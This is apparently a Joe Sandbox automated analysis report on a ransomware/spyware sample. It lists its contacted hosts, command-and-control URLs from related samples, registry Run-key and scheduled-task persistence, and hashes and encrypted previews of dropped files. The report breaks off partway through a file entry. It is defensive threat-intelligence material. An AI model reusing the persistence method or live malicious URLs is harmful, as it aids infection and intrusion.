              https://api.2ip.ua/geo.jsonp2C0XWmZAnYk.exe, 0000000C.00000002.2276840606.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              188.114.96.3
              api.2ip.uaEuropean Union
              13335CLOUDFLARENETUSfalse
              92.246.89.93
              znpst.topRussian Federation
              49558LIVECOMM-ASRespublikanskayastr3k6RUtrue
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1492473
              Start date and time:2024-08-13 21:58:05 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 9m 23s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:15
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:C0XWmZAnYk.exe
              renamed because original name is a hash value
              Original Sample Name:8f81e96f8c96dec003b51826bbd5885f.exe
              Detection:MAL
              Classification:mal100.rans.spre.troj.spyw.evad.winEXE@18/1343@7/2
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 88%
              • Number of executed functions: 28
              • Number of non-executed functions: 185
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadFile calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
              • Report size getting too big, too many NtWriteFile calls found.
              • VT rate limit hit for: C0XWmZAnYk.exe
              TimeTypeDescription
              15:59:21API Interceptor1x Sleep call for process: C0XWmZAnYk.exe modified
              21:58:58Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe s>--Task
              21:59:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart
              21:59:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              188.114.96.3http://proph.co.ukGet hashmaliciousUnknownBrowse
              • proph.co.uk/blog/
              7092832738283792.exeGet hashmaliciousFormBookBrowse
              • www.coinwab.com/kqqj/
              g45zz6J4tL.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
              • 376294cm.n9sh.top/JavascriptprocessorAuth.php
              2fc214327d8e0c9782386edac75d16fd9c3d37ae5919f.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
              • 782652cm.n9sh.top/providerImageProcessorGeneratorwp.php
              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
              • filetransfer.io/data-package/FlSwNt8v/download
              QUOTATION_AUGQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
              • filetransfer.io/data-package/NOfCC37q/download
              b1rtNoexdE.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
              • 199719cm.nyashka.top/ToPythonRequestupdateBigloadDbTrackwplocal.php
              Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exeGet hashmaliciousFormBookBrowse
              • www.jnhdh8827.com/pz12/?uTm4D=tXrQrgXPfQCqrAqcdoT/KCxiftMWx+uc6jO1VE/0fl1BeE1n2goaTZbQHXHyD6os1JO7aTrmdA==&tX9tN=1bMtYrqh7B54XFQP
              z4Nuevalistaadjunta.exeGet hashmaliciousDBatLoader, FormBookBrowse
              • www.coinwab.com/kqqj/
              ACCEPT_014STSY529093.PDF.exeGet hashmaliciousAzorultBrowse
              • l0h5.shop/CM341/index.php
              92.246.89.93A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • fuyt.org/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
              DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
              • fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
              E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
              • fuyt.org/test1/get.php?pid=F45A1084736B94F4480CF5D84F7F4DDD
              LisectAVT_2403002B_290.exeGet hashmaliciousBdaejecBrowse
              • afeifieuuufufufuf.su/tldr.php?newinf=1
              FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • fuyt.org/test1/get.php?pid=3630DD81AC10B7EC98F7204E360B9D7E
              F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • fuyt.org/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54
              F2E3FA89C1A2C72EA78C4D32446221C08B30C7C3363F8248F04AA9EEE2E15C70.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • fuyt.org/fhsgtsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4
              E1BE354A31A340C3EBE7BF14ED0FBBCB788A47190B253D05067E9E8698C25698.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • fuyt.org/test1/get.php?pid=3630DD81AC10B7EC98F7204E360B9D7E
              D932DBE6A5BE50D4668037CD66420FC424DE0B57368ED6FC8A1D249F4D6D1E10.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
              • fuyt.org/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
              DA0E4FADC9227BEC63E5BFD562EEFE9682C2131E4DFB8BA2A1A0ECA7C699BB99.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • fuyt.org/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              api.2ip.ua284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exeGet hashmaliciousAmadey, DarkTortilla, Djvu, LummaC Stealer, RedLine, Stealc, VidarBrowse
              • 188.114.96.3
              file.exeGet hashmaliciousBabuk, DjvuBrowse
              • 188.114.97.3
              setup.exeGet hashmaliciousBabuk, DjvuBrowse
              • 188.114.96.3
              e8997f96b91ab5ea1fed555a7d62369a8307b0cfcbd0e32c5e9a7e430ab42240.zipGet hashmaliciousDjvuBrowse
              • 188.114.97.3
              A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 188.114.96.3
              DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
              • 188.114.97.3
              E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
              • 188.114.96.3
              FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 188.114.96.3
              F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 188.114.96.3
              F2E3FA89C1A2C72EA78C4D32446221C08B30C7C3363F8248F04AA9EEE2E15C70.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 188.114.96.3
              znpst.topF7E3DjYJpC.exeGet hashmaliciousAmadey Raccoon RedLine SmokeLoaderBrowse
              • 31.166.224.38
              25Kf6vSBoq.exeGet hashmaliciousAmadey Raccoon RedLine SmokeLoaderBrowse
              • 151.251.30.69
              CFE9H9mdWr.exeGet hashmaliciousAmadey Raccoon RedLine SmokeLoader VidarBrowse
              • 176.123.228.234
              cnv622JnZv.exeGet hashmaliciousAmadey Raccoon RedLine SmokeLoaderBrowse
              • 61.98.7.132
              y8WngeDn4q.exeGet hashmaliciousRaccoon RedLine SmokeLoader VidarBrowse
              • 5.163.179.4
              SYzU0M7gx6.exeGet hashmaliciousRaccoon RedLine SmokeLoaderBrowse
              • 91.203.174.38
              SkB6zJ6H3N.exeGet hashmaliciousRaccoon SmokeLoader VidarBrowse
              • 116.121.62.237
              Md0q201V1D.exeGet hashmaliciousRaccoon RedLine SmokeLoader VidarBrowse
              • 211.59.14.90
              yj2Lz2zdxp.exeGet hashmaliciousRaccoon SmokeLoader VidarBrowse
              • 58.235.189.190
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              LIVECOMM-ASRespublikanskayastr3k6RUA9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 92.246.89.93
              DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
              • 92.246.89.93
              E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
              • 92.246.89.93
              LisectAVT_2403002B_290.exeGet hashmaliciousBdaejecBrowse
              • 92.246.89.93
              FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 92.246.89.93
              F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 92.246.89.93
              F2E3FA89C1A2C72EA78C4D32446221C08B30C7C3363F8248F04AA9EEE2E15C70.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 92.246.89.93
              E1BE354A31A340C3EBE7BF14ED0FBBCB788A47190B253D05067E9E8698C25698.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 92.246.89.93
              D932DBE6A5BE50D4668037CD66420FC424DE0B57368ED6FC8A1D249F4D6D1E10.exeGet hashmaliciousBabuk, Bdaejec, Djvu, ZorabBrowse
              • 92.246.89.93
              DA0E4FADC9227BEC63E5BFD562EEFE9682C2131E4DFB8BA2A1A0ECA7C699BB99.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
              • 92.246.89.93
              CLOUDFLARENETUSsetup.exeGet hashmaliciousAmadey, CryptbotBrowse
              • 104.21.15.43
              https://clicks.aweber.com/y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lg#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
              • 104.17.25.14
              WinRAR 7.01 Pro.exeGet hashmaliciousPureLog Stealer, WorldWind StealerBrowse
              • 104.16.185.241
              https://shared.outlook.inky.com/link?domain=urldefense.proofpoint.com&t=h.eJxVkEtvozAUhf9KxYLVEIx5GCqhNiFNptOSx6RKaDfIwTYQDCbYIW2q-e8Tshhpdvfe7-gc3fOtnTqu3d9phVKtvDfN60ooo42ko7YTgrWibNQoE7XZwwE-nMKb1LDHaVoIRTkva9zhZtCkqm5TnYTTczzDaz0L6Wn-IVWG36ac92X9tPD36JB05-OSGb07TiPS5s2WlWUc6104SY-LC7qgbH7Ik32fS1CAjYri1c7hLwntDeod3DQDKRzrddj31mrxu_u5MxLIn4vklLxWbIXtsxdNYhSp5eLTY2vL_6z41HAqkWy2r9Dl0XMt1ruifNJlKAzaBvj9Mnc_Nl_2jPrVL0vmUy_a-tvga1mUR9i_LeVsomKdhtqPO60aumqoEl3OFEII2kFg5uz6f8VEpx7_TbghUjTy1pxFCPV8Zw-wBxAJMPMBCxwbMB8Ci0BgWlcfF3m25YwgHGLoLQbzq4N4xBdFM1zXg9cAyQD_O_75C-4tliU.MEUCIGCTUJYQT5-VanQzq1VIvFGhfyGZtavaJnUbdai61s34AiEA_BgUSURRBn4yGaiUonx_tjHhD3-L9hRZnt-UwOnBEKgGet hashmaliciousHTMLPhisherBrowse
              • 104.17.25.14
              https://www.regionvictoriaville.com/page/?ContentID=1257Get hashmaliciousUnknownBrowse
              • 104.18.0.16
              New Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
              • 104.21.67.152
              https://t.co/Y17IUmKzLP&c=E,1,rN9D8kDrUrBrFtQ3pz430P3IvJQs_POn2q4ijJOHyc835Jmr3S-o01lUVXZ5cvoOfcOdGZN-yp3O-JcUg0G4MtYkdN9rotmh1Tkon6mUrCEHmjgm-PDFw3ee&typo=1Get hashmaliciousUnknownBrowse
              • 104.16.225.240
              http://cdnpixelnetworks.netGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              http://www.ms4x.netGet hashmaliciousUnknownBrowse
              • 162.159.135.232
              https://reviewm4law.rpabox.cloud/Get hashmaliciousHTMLPhisherBrowse
              • 104.18.16.168
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              37f463bf4616ecd445d4a1937da06e19New Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
              • 188.114.96.3
              Statements of Account-10-02-24.vbsGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              Update.jsGet hashmaliciousSocGholishBrowse
              • 188.114.96.3
              Fj8bSgJTob.exeGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              Fj8bSgJTob.exeGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              Quotation No.VFLOIPS31052024-1_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
              • 188.114.96.3
              z73MSYWJ18.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
              • 188.114.96.3
              z73MSYWJ18.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
              • 188.114.96.3
              yWGzX7xR3D.dllGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              yWGzX7xR3D.dllGet hashmaliciousUnknownBrowse
              • 188.114.96.3
              No context
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):42
              Entropy (8bit):4.802915339393917
              Encrypted:false
              SSDEEP:3:aPjmdRjJUy:aSdxay
              MD5:2F4C231FB78464D474ABFFC39C21F41C
              SHA1:204197CDB2B7D8A7ABA0F7C42F2CE1E9F7AA535A
              SHA-256:62CEDA345CB075232E4943E4B1C835F11E08FCCA8FC4EE8B212D60BE51AD2475
              SHA-512:96EE2920A1D931E3BBD29ABD3263D87AA192F49ECFF1AFF2017E3A4298675C4DC67F1EC8A321F1C8C84DA15FE5D2F6997BB220A45EA44709DE6C5DF881D61C34
              Malicious:false
              Reputation:low
              Preview:gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1..
              Process:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):628
              Entropy (8bit):7.619508278175522
              Encrypted:false
              SSDEEP:12:kHALZzTjGW9yKzUYV2oZesBw2crDX6DlbZYjGX2X3Sa73HP6BQMxdxa3cii9a:RlzTT9/g1oZesBw3QlOPj73yhd+bD
              MD5:3948C76105F4D6D19795F239634BCAAA
              SHA1:BF9CFA4E242A4ACB63FEBB1EE4B45FC7E19ABCB9
              SHA-256:32FFDBE1518EF6078A5C08C33013297785CDEA01C90215F13CE4ACF9C2F9B6AF
              SHA-512:D855A298A2A50EEFF3D9498D4F0DE89082DD43265D89D95ADEC6911B9236183F49B6A3FEA61F40A979B4B506C7EA5FBC2DA2D6C0466026D4EC27C0266E98A968
              Malicious:false
              Reputation:low
              Preview:2023/"a.?....97....IEC...V..l..Y?..).%J<.kB.......V_...F.Y.5.,.AW+..D|v........"uu.4..a.......^.`..qA%^..O._.......P....0..2.......j9..3.M..-..............HK....&.c..E..g.$g....]dy........&H..J..2 [.Y.J/DN%.e.q[. 3...Z.. ...vH.d.d.;f....h....%....,.'..X....^..Q...r`.~!H.*_.0..N&.P.....P...,C.Z.=...H/.....c..BV.....C.j.[.w...O]o.2.:)..;.W...t.YC.......x.>...a......]8.A".=`.w..I.Ap...^...M2..,V-d............:.LWJ.R..!V..+....X.2>.l...aL......|c..ON..... ..e('D...Z[KN.....gN.,.".y....j.....].<..]......eY{..N%".0..Y.o.|a.Y.>....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):628
              Entropy (8bit):7.619508278175522
              Encrypted:false
              SSDEEP:12:kHALZzTjGW9yKzUYV2oZesBw2crDX6DlbZYjGX2X3Sa73HP6BQMxdxa3cii9a:RlzTT9/g1oZesBw3QlOPj73yhd+bD
              MD5:3948C76105F4D6D19795F239634BCAAA
              SHA1:BF9CFA4E242A4ACB63FEBB1EE4B45FC7E19ABCB9
              SHA-256:32FFDBE1518EF6078A5C08C33013297785CDEA01C90215F13CE4ACF9C2F9B6AF
              SHA-512:D855A298A2A50EEFF3D9498D4F0DE89082DD43265D89D95ADEC6911B9236183F49B6A3FEA61F40A979B4B506C7EA5FBC2DA2D6C0466026D4EC27C0266E98A968
              Malicious:false
              Reputation:low
              Preview:2023/"a.?....97....IEC...V..l..Y?..).%J<.kB.......V_...F.Y.5.,.AW+..D|v........"uu.4..a.......^.`..qA%^..O._.......P....0..2.......j9..3.M..-..............HK....&.c..E..g.$g....]dy........&H..J..2 [.Y.J/DN%.e.q[. 3...Z.. ...vH.d.d.;f....h....%....,.'..X....^..Q...r`.~!H.*_.0..N&.P.....P...,C.Z.=...H/.....c..BV.....C.j.[.w...O]o.2.:)..;.W...t.YC.......x.>...a......]8.A".=`.w..I.Ap...^...M2..,V-d............:.LWJ.R..!V..+....X.2>.l...aL......|c..ON..... ..e('D...Z[KN.....gN.,.".y....j.....].<..]......eY{..N%".0..Y.o.|a.Y.>....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):669
              Entropy (8bit):7.6713737226429
              Encrypted:false
              SSDEEP:12:k5iOi33xBloqFpJBFAlMYM8+jEshIx+dZR6pDzojsJL7Nz9YJwhdxa3cii9a:F3h7FFw+5j1IUaDYsJPNJYJwhd+bD
              MD5:5276D7089EF98E503A188E6D7F1EA63A
              SHA1:CA60E35086244DC37E456DF307214D7DD1048540
              SHA-256:EB225CDA42DE3BFC6D270E74A5AA0360EAF3C1549E4D2DB4C3CFFC9B3F768C00
              SHA-512:FC419493FB16C90EB181CC18A7FDDC4FB1B29D2367BFA02BD5938E5C82C7C106B7C60B34F3BCD97D1E9E74C3CD98BB258FC9A2D35C88B5256F3A0E18A89B829B
              Malicious:false
              Reputation:low
              Preview:2023/....?h[......-...B. ...8./..b..y.+.*..8ub.`a....c....:......B......L..C....%..;^g>{.....p.z..\..x.2.+.h.*I.>d.yI..3$]..cY.+..P..Q{.#s$..x.4....m: p..8uV..2..|6.=....K?..\.xg?4.h5W.We..`.%.>d.!N z...'.{.;K......Npa, N...`.]7.d.'...F..r.......H..!...Z........O....@..W.._.M.([r.:.o5..$.\...u..TvU..veN...d4O...&......S.LQ.....;.BS.#E..c.8...P...9@e@.........S.{.....mX..xb..uO.v....`p.{*R...].U...T]...^..Z....h.q/[...e.C7...;.4.1...Q.....#..:5...s..=.7.......x-.KH.Zl)tm(C.D)jw.W.....MJk....G......*0a..'.?~T..\....4(..%.?..w.M.9..J/.s...21...R.F.z.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):669
              Entropy (8bit):7.6713737226429
              Encrypted:false
              SSDEEP:12:k5iOi33xBloqFpJBFAlMYM8+jEshIx+dZR6pDzojsJL7Nz9YJwhdxa3cii9a:F3h7FFw+5j1IUaDYsJPNJYJwhd+bD
              MD5:5276D7089EF98E503A188E6D7F1EA63A
              SHA1:CA60E35086244DC37E456DF307214D7DD1048540
              SHA-256:EB225CDA42DE3BFC6D270E74A5AA0360EAF3C1549E4D2DB4C3CFFC9B3F768C00
              SHA-512:FC419493FB16C90EB181CC18A7FDDC4FB1B29D2367BFA02BD5938E5C82C7C106B7C60B34F3BCD97D1E9E74C3CD98BB258FC9A2D35C88B5256F3A0E18A89B829B
              Malicious:false
              Reputation:low
              Preview:2023/....?h[......-...B. ...8./..b..y.+.*..8ub.`a....c....:......B......L..C....%..;^g>{.....p.z..\..x.2.+.h.*I.>d.yI..3$]..cY.+..P..Q{.#s$..x.4....m: p..8uV..2..|6.=....K?..\.xg?4.h5W.We..`.%.>d.!N z...'.{.;K......Npa, N...`.]7.d.'...F..r.......H..!...Z........O....@..W.._.M.([r.:.o5..$.\...u..TvU..veN...d4O...&......S.LQ.....;.BS.#E..c.8...P...9@e@.........S.{.....mX..xb..uO.v....`p.{*R...].U...T]...^..Z....h.q/[...e.C7...;.4.1...Q.....#..:5...s..=.7.......x-.KH.Zl)tm(C.D)jw.W.....MJk....G......*0a..'.?~T..\....4(..%.?..w.M.9..J/.s...21...R.F.z.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):818
              Entropy (8bit):7.7496416647349315
              Encrypted:false
              SSDEEP:24:YKWnXxs5W3TwyCUuJnt2D2EPOxTrrbz3d+bD:YxXxAWDwbHKD2EPOxbt8D
              MD5:63BC1E75BD856EFF2D04A196CE76F180
              SHA1:C2CE35E43602DFE5FC438F8484AB745A0D1086E3
              SHA-256:0C1B2975FD6491965E7E89EF27BE439D137BCBE4B6DDEAD9F2A3E71356318B77
              SHA-512:0EE956E3CB3617F2C12EF6CE04BBC262C3F507DEC8AB09CABDE3CE6596CEB0084CD938423400ED8F84303797B0D630A51F0BC5D7CFB6D60DEC499E33EDFB9D84
              Malicious:false
              Reputation:low
              Preview:{"os_k.#<#....K...2t.....t.R.... J,..Bu...T...v.Ua..........=\.k...H...b...U.5+9K......hFi..9...x.+....:...e..V.oV0[.|'..-..q8.z.................[.y...".....6..8..\Q.(..g^......g...<.#...q...`Q.l...7ui.l.........:.......2...>.;..@!..&]..Y.n....V..W.F.C.%.,."........rE:..1.j..jGl.S.?.;S.S..Q./..u..c..a....EY.67...T..nA....H.N..=C^,..n4N...s..h.[....{Z5g...b.T.......~..K...YN...".T.....8..[}.6h.E]..u.+..b.V..A.../.....=..I'...Z6........".`.a..\.S..o...../..I.W,.#.n..r.@.g8p..D....O.....#.ph.....$....$.3(H@..E.!./;...^..!....KG{r.@f.)S...-[.I.N..b'.."{6.`...Q..(.......<S...a....;...vv...=.....W.._......po}{...g/ ...........2..]........M..Z........T...&../#......R..u.......7......r.)w...BR....&..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):818
              Entropy (8bit):7.7496416647349315
              Encrypted:false
              SSDEEP:24:YKWnXxs5W3TwyCUuJnt2D2EPOxTrrbz3d+bD:YxXxAWDwbHKD2EPOxbt8D
              MD5:63BC1E75BD856EFF2D04A196CE76F180
              SHA1:C2CE35E43602DFE5FC438F8484AB745A0D1086E3
              SHA-256:0C1B2975FD6491965E7E89EF27BE439D137BCBE4B6DDEAD9F2A3E71356318B77
              SHA-512:0EE956E3CB3617F2C12EF6CE04BBC262C3F507DEC8AB09CABDE3CE6596CEB0084CD938423400ED8F84303797B0D630A51F0BC5D7CFB6D60DEC499E33EDFB9D84
              Malicious:false
              Reputation:low
              Preview:{"os_k.#<#....K...2t.....t.R.... J,..Bu...T...v.Ua..........=\.k...H...b...U.5+9K......hFi..9...x.+....:...e..V.oV0[.|'..-..q8.z.................[.y...".....6..8..\Q.(..g^......g...<.#...q...`Q.l...7ui.l.........:.......2...>.;..@!..&]..Y.n....V..W.F.C.%.,."........rE:..1.j..jGl.S.?.;S.S..Q./..u..c..a....EY.67...T..nA....H.N..=C^,..n4N...s..h.[....{Z5g...b.T.......~..K...YN...".T.....8..[}.6h.E]..u.+..b.V..A.../.....=..I'...Z6........".`.a..\.S..o...../..I.W,.#.n..r.@.g8p..D....O.....#.ph.....$....$.3(H@..E.!./;...^..!....KG{r.@f.)S...-[.I.N..b'.."{6.`...Q..(.......<S...a....;...vv...=.....W.._......po}{...g/ ...........2..]........M..Z........T...&../#......R..u.......7......r.)w...BR....&..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3947
              Entropy (8bit):7.952858396713951
              Encrypted:false
              SSDEEP:96:iZ0+xejleTe/pJN6bhQ9o6kzCe0P70iXW7d+0OlRnVfnC:iZCj8CiC2gT08gd+bndnC
              MD5:9E957CA2FC6F3ECA2F5696EB25703864
              SHA1:CAAB6042E9B11823420B7C9D930A17AE752E0B5E
              SHA-256:6F4D9FE1E091146A3BDE99D1195EFBB433263E283D865F2EED1BD4E8E617CA5F
              SHA-512:4545AA97481129F3A9FE2C20840D0017B45A937F7CAD0B16299B477F3CD174D584DC73EE41B913C9CF2536E2C980C8062BFC8B264919140AD12ADC8BB1A2B16D
              Malicious:false
              Reputation:low
              Preview:*...#G.zm..(=..9...L.w.l.}$+....3.H.....}>".M.....5....M3..t.'.,/.+..^~-...S..J*.D?H.sJg.A.c>.(..-......l..e.V^2O.m...Y.d.f..,5"nrEU..~.y.....&gx.p.y?..e...1.IY.....P...wLCfs^x...w.|v...k....C<'..w[./[.........[...[/vp....*...f..|......|.W.?..%....`...v&...PKk.....[.....e!^.1o.......L>0.0.b.X...o$...`.e..r...g!6....6|W....h.:....?...8F6..JI..iuo.....Q....dG!@rXa}5....`p.O....~.J]..g..b.....|.....&..Iw.5.]DO$....8.-....o.+....c.Y....]....g.uI...,.o.?Q8.dmq..m.=.....v..L.Ao..v.I......i-..Y.*m.f..qG..D.s..^ {.q.....qM.0.C...AG..E..-.;X.l..7o@7g.........B...a!F.0.{..m.N.vM.-U.m..5.........k.|..N..A..T...H...*..h..b..{..&..CF....s3@@....?.r.C.O{...&....k.E..#.I.....Q.....^.tCi.O.)..x.O.&.].[...f.......I...?.5C...$.P+0..DZ.1...[DAq...Y..%n\.....K...Q...g.;.0a7om.....,.j..@.;..4.....d....xm...c-....].....>,Sz/K ..x..d#..@.P;...{..v.Zx,..a..^.Xa...Gx..1...rW.\..e... ..x.P.:.%...%Aq.........q..m..2d..z.O.,-._.3A/[...K........M.o....AbX..p..
              Process:C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3947
              Entropy (8bit):7.952858396713951
              Encrypted:false
              SSDEEP:96:iZ0+xejleTe/pJN6bhQ9o6kzCe0P70iXW7d+0OlRnVfnC:iZCj8CiC2gT08gd+bndnC
              MD5:9E957CA2FC6F3ECA2F5696EB25703864
              SHA1:CAAB6042E9B11823420B7C9D930A17AE752E0B5E
              SHA-256:6F4D9FE1E091146A3BDE99D1195EFBB433263E283D865F2EED1BD4E8E617CA5F
